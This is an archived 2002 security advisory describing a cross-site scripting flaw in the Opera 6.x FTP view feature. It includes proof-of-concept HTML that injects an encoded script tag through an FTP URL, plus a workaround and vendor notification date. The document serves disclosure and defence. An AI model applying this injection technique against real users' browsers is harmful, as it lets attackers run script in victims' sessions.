operaftp.txt

2002-08-09T00:00:00
ID PACKETSTORM:26526
Type packetstorm
Reporter Eiji Yoshida
Modified 2002-08-09T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Title:  
~~~~~~~~~~~~~~~~~  
Opera FTP View Cross-Site Scripting Vulnerability  
  
  
Date:  
~~~~~~~~~~~~~~~~~  
4 August 2002  
  
  
Author:  
~~~~~~~~~~~~~~~~~  
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]  
  
  
Risk:  
~~~~~~~~~~~~~~~~~  
Medium  
  
  
Vulnerable:  
~~~~~~~~~~~~~~~~~  
Windows2000 SP2 Opera 6.03  
Windows2000 SP2 Opera 6.04  
  
  
Overview:  
~~~~~~~~~~~~~~~~~  
Opera allows running Malicious Scripts due to a bug in 'FTP view' feature.  
If you click on a malicious link, the script embedded in URL will run.  
  
  
Details:  
~~~~~~~~~~~~~~~~~  
This problem is in 'FTP view' feature.  
The '<title>URL</title>' is not escaped.  
  
  
Exploit code:  
~~~~~~~~~~~~~~~~~  
<html>  
<head>  
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">  
</head>  
<body>  
<script>window.open("ftp://[FTPserver]/");</script>  
</body>  
</html>  
  
Example:  
<html>  
<head>  
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">  
</head>  
<body>  
<script>window.open("ftp://ftp.opera.com/");</script>  
</body>  
</html>  
  
  
Demonstration:  
~~~~~~~~~~~~~~~~~  
http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html  
  
  
Workaround:  
~~~~~~~~~~~~~~~~~  
Disable JavaScript.  
  
  
Vendor status:  
~~~~~~~~~~~~~~~~~  
Opera Software ASA was notified on 30 June 2002.  
  
  
- -------------------------------------------------------------  
Eiji "James" Yoshida  
penetration technique research site  
E-mail: zaddik@geocities.co.jp  
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm  
- -------------------------------------------------------------  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 6.5.8ckt  
Comment: Eiji James Yoshida  
  
iQA/AwUBPU92oTnqpMRtMot1EQKN1gCcCsMtg6cAEBGMdfupW/WvmYIl+R0AoK1E  
JiccWmvatZQwH9YV3FX8q1pv  
=eHkj  
-----END PGP SIGNATURE-----  
  
  
  
`